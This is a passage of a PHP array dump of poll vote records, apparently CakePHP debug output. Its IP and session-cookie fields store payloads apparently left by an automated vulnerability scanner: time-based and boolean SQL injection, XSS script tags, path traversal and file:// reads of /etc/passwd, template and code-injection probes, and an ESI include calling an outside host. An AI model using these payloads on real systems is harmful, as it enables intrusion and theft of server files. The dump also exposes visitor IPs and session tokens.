(int) 6472 => array(
'id' => '7015',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6473 => array(
'id' => '7016',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6474 => array(
'id' => '7017',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6475 => array(
'id' => '7018',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6476 => array(
'id' => '7019',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6477 => array(
'id' => '7020',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6478 => array(
'id' => '7021',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6479 => array(
'id' => '7022',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6480 => array(
'id' => '7023',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6481 => array(
'id' => '7024',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6482 => array(
'id' => '7025',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6483 => array(
'id' => '7026',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6484 => array(
'id' => '7027',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6485 => array(
'id' => '7028',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6486 => array(
'id' => '7029',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6487 => array(
'id' => '7030',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6488 => array(
'id' => '7031',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6489 => array(
'id' => '7032',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6490 => array(
'id' => '7033',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6491 => array(
'id' => '7034',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6492 => array(
'id' => '7035',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6493 => array(
'id' => '7036',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6494 => array(
'id' => '7037',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6495 => array(
'id' => '7038',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6496 => array(
'id' => '7039',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6497 => array(
'id' => '7040',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6498 => array(
'id' => '7041',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6499 => array(
'id' => '7042',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6500 => array(
'id' => '7043',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6501 => array(
'id' => '7044',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6502 => array(
'id' => '7045',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6503 => array(
'id' => '7046',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6504 => array(
'id' => '7047',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6505 => array(
'id' => '7048',
'ip' => '85.190.233.47'"',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6506 => array(
'id' => '7049',
'ip' => '85.190.233.479814625',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6507 => array(
'id' => '7050',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2'"()&%<zzz><ScRiPt >z1SW(9491)</ScRiPt>',
'sondage_id' => '2'
),
(int) 6508 => array(
'id' => '7051',
'ip' => '85.190.233.47',
'ip1' => ''"()&%<zzz><ScRiPt >z1SW(9491)</ScRiPt>',
'sondage_id' => '2'
),
(int) 6509 => array(
'id' => '7052',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe29722751',
'sondage_id' => '2'
),
(int) 6510 => array(
'id' => '7053',
'ip' => '@@8Hnv2',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6511 => array(
'id' => '7054',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6512 => array(
'id' => '7055',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6513 => array(
'id' => '7056',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6514 => array(
'id' => '7057',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6515 => array(
'id' => '7058',
'ip' => '85.190.233.47',
'ip1' => '-1 OR 2+722-722-1=0+0+0+1 -- ',
'sondage_id' => '2'
),
(int) 6516 => array(
'id' => '7059',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6517 => array(
'id' => '7060',
'ip' => '85.190.233.47',
'ip1' => '-1 OR 2+759-759-1=0+0+0+1',
'sondage_id' => '2'
),
(int) 6518 => array(
'id' => '7061',
'ip' => '85.190.233.47',
'ip1' => '-1' OR 2+732-732-1=0+0+0+1 -- ',
'sondage_id' => '2'
),
(int) 6519 => array(
'id' => '7062',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6520 => array(
'id' => '7063',
'ip' => '85.190.233.47',
'ip1' => '-1' OR 2+720-720-1=0+0+0+1 or 'ivhlL6ZE'='',
'sondage_id' => '2'
),
(int) 6521 => array(
'id' => '7064',
'ip' => '85.190.233.47',
'ip1' => '-1" OR 2+594-594-1=0+0+0+1 -- ',
'sondage_id' => '2'
),
(int) 6522 => array(
'id' => '7065',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6523 => array(
'id' => '7066',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6524 => array(
'id' => '7067',
'ip' => '85.190.233.47',
'ip1' => 'if(now()=sysdate(),sleep(15),0)',
'sondage_id' => '2'
),
(int) 6525 => array(
'id' => '7068',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe20'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z',
'sondage_id' => '2'
),
(int) 6526 => array(
'id' => '7069',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe20"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z',
'sondage_id' => '2'
),
(int) 6527 => array(
'id' => '7070',
'ip' => '85.190.233.47',
'ip1' => '(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/',
'sondage_id' => '2'
),
(int) 6528 => array(
'id' => '7071',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2-1 waitfor delay '0:0:15' -- ',
'sondage_id' => '2'
),
(int) 6529 => array(
'id' => '7072',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2ZIKllOV2'; waitfor delay '0:0:15' -- ',
'sondage_id' => '2'
),
(int) 6530 => array(
'id' => '7073',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2ZFDVU3yM' OR 556=(SELECT 556 FROM PG_SLEEP(15))--',
'sondage_id' => '2'
),
(int) 6531 => array(
'id' => '7074',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2scahlnNc') OR 284=(SELECT 284 FROM PG_SLEEP(15))--',
'sondage_id' => '2'
),
(int) 6532 => array(
'id' => '7075',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2qjXYQkEn')) OR 963=(SELECT 963 FROM PG_SLEEP(15))--',
'sondage_id' => '2'
),
(int) 6533 => array(
'id' => '7076',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'',
'sondage_id' => '2'
),
(int) 6534 => array(
'id' => '7077',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6535 => array(
'id' => '7078',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2'"',
'sondage_id' => '2'
),
(int) 6536 => array(
'id' => '7079',
'ip' => '85.190.233.47',
'ip1' => '@@yJfGI',
'sondage_id' => '2'
),
(int) 6537 => array(
'id' => '7080',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6538 => array(
'id' => '7081',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6539 => array(
'id' => '7082',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6540 => array(
'id' => '7083',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6541 => array(
'id' => '7084',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6542 => array(
'id' => '7085',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6543 => array(
'id' => '7086',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6544 => array(
'id' => '7087',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6545 => array(
'id' => '7088',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6546 => array(
'id' => '7089',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6547 => array(
'id' => '7090',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6548 => array(
'id' => '7091',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6549 => array(
'id' => '7092',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6550 => array(
'id' => '7093',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6551 => array(
'id' => '7094',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6552 => array(
'id' => '7095',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6553 => array(
'id' => '7096',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6554 => array(
'id' => '7097',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6555 => array(
'id' => '7098',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6556 => array(
'id' => '7099',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6557 => array(
'id' => '7100',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6558 => array(
'id' => '7101',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6559 => array(
'id' => '7102',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6560 => array(
'id' => '7103',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6561 => array(
'id' => '7104',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6562 => array(
'id' => '7105',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6563 => array(
'id' => '7106',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6564 => array(
'id' => '7107',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6565 => array(
'id' => '7108',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6566 => array(
'id' => '7109',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6567 => array(
'id' => '7110',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6568 => array(
'id' => '7111',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6569 => array(
'id' => '7112',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6570 => array(
'id' => '7113',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6571 => array(
'id' => '7114',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6572 => array(
'id' => '7115',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6573 => array(
'id' => '7116',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6574 => array(
'id' => '7117',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6575 => array(
'id' => '7118',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6576 => array(
'id' => '7119',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6577 => array(
'id' => '7120',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6578 => array(
'id' => '7121',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6579 => array(
'id' => '7122',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6580 => array(
'id' => '7123',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6581 => array(
'id' => '7124',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6582 => array(
'id' => '7125',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6583 => array(
'id' => '7126',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6584 => array(
'id' => '7127',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6585 => array(
'id' => '7128',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6586 => array(
'id' => '7129',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6587 => array(
'id' => '7130',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6588 => array(
'id' => '7131',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6589 => array(
'id' => '7132',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6590 => array(
'id' => '7133',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6591 => array(
'id' => '7134',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6592 => array(
'id' => '7135',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6593 => array(
'id' => '7136',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6594 => array(
'id' => '7137',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6595 => array(
'id' => '7138',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6596 => array(
'id' => '7139',
'ip' => '1Qhvqsn4O',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6597 => array(
'id' => '7140',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6598 => array(
'id' => '7141',
'ip' => '85.190.233.47',
'ip1' => '1kgeTXLAO',
'sondage_id' => '2'
),
(int) 6599 => array(
'id' => '7142',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6600 => array(
'id' => '7143',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6601 => array(
'id' => '7144',
'ip' => 'Uw7GGpV4',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6602 => array(
'id' => '7145',
'ip' => 'dzXCmjo4: c6B0LO3Q',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6603 => array(
'id' => '7146',
'ip' => '85.190.233.47',
'ip1' => 'qRYGV2Fr',
'sondage_id' => '2'
),
(int) 6604 => array(
'id' => '7147',
'ip' => '85.190.233.47',
'ip1' => 'response.write(9361771*9578483)',
'sondage_id' => '2'
),
(int) 6605 => array(
'id' => '7148',
'ip' => '85.190.233.47',
'ip1' => 'WjTlZH88: WIAN7qLp',
'sondage_id' => '2'
),
(int) 6606 => array(
'id' => '7149',
'ip' => '85.190.233.47',
'ip1' => ''+response.write(9361771*9578483)+'',
'sondage_id' => '2'
),
(int) 6607 => array(
'id' => '7150',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6608 => array(
'id' => '7151',
'ip' => '85.190.233.47',
'ip1' => '"+response.write(9361771*9578483)+"',
'sondage_id' => '2'
),
(int) 6609 => array(
'id' => '7152',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6610 => array(
'id' => '7153',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6611 => array(
'id' => '7154',
'ip' => 'file:///etc/passwd',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6612 => array(
'id' => '7155',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6613 => array(
'id' => '7156',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6614 => array(
'id' => '7157',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6615 => array(
'id' => '7158',
'ip' => '${10000190+10000075}',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6616 => array(
'id' => '7159',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2<esi:include src="http://bxss.me/rpb.png"/>',
'sondage_id' => '2'
),
(int) 6617 => array(
'id' => '7160',
'ip' => '../85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6618 => array(
'id' => '7161',
'ip' => '85.190.233.47',
'ip1' => '${9999955+9999103}',
'sondage_id' => '2'
),
(int) 6619 => array(
'id' => '7162',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6620 => array(
'id' => '7163',
'ip' => '85.190.233.47',
'ip1' => '../../../../../../../../../../../../../../etc/passwd',
'sondage_id' => '2'
),
(int) 6621 => array(
'id' => '7164',
'ip' => '85.190.233.47',
'ip1' => '../../../../../../../../../../../../../../windows/win.ini',
'sondage_id' => '2'
),
(int) 6622 => array(
'id' => '7165',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6623 => array(
'id' => '7166',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6624 => array(
'id' => '7167',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6625 => array(
'id' => '7168',
'ip' => '85.190.233.47',
'ip1' => 'file:///etc/passwd',
'sondage_id' => '2'
),
(int) 6626 => array(
'id' => '7169',
'ip' => '85.190.233.47',
'ip1' => 'WlJ6b2xlYldFdEp1dnYwZ1ZoMWd5Z1VaUzJ0SUZnOTJiOTBONFNVYQ==',
'sondage_id' => '2'
),
(int) 6627 => array(
'id' => '7170',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6628 => array(
'id' => '7171',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6629 => array(
'id' => '7172',
'ip' => '85.190.233.47',
'ip1' => '../CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6630 => array(
'id' => '7173',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2&n959036=v911098',
'sondage_id' => '2'
),
(int) 6631 => array(
'id' => '7174',
'ip' => '85.190.233.47',
'ip1' => '',
'sondage_id' => '2'
),
(int) 6632 => array(
'id' => '7175',
'ip' => ')',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6633 => array(
'id' => '7176',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6634 => array(
'id' => '7177',
'ip' => '!(()&&!|*|*|',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6635 => array(
'id' => '7178',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6636 => array(
'id' => '7179',
'ip' => '^(#$!@#$)(()))******',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6637 => array(
'id' => '7180',
'ip' => '85.190.233.47',
'ip1' => ')',
'sondage_id' => '2'
),
(int) 6638 => array(
'id' => '7181',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6639 => array(
'id' => '7182',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6640 => array(
'id' => '7183',
'ip' => '85.190.233.47',
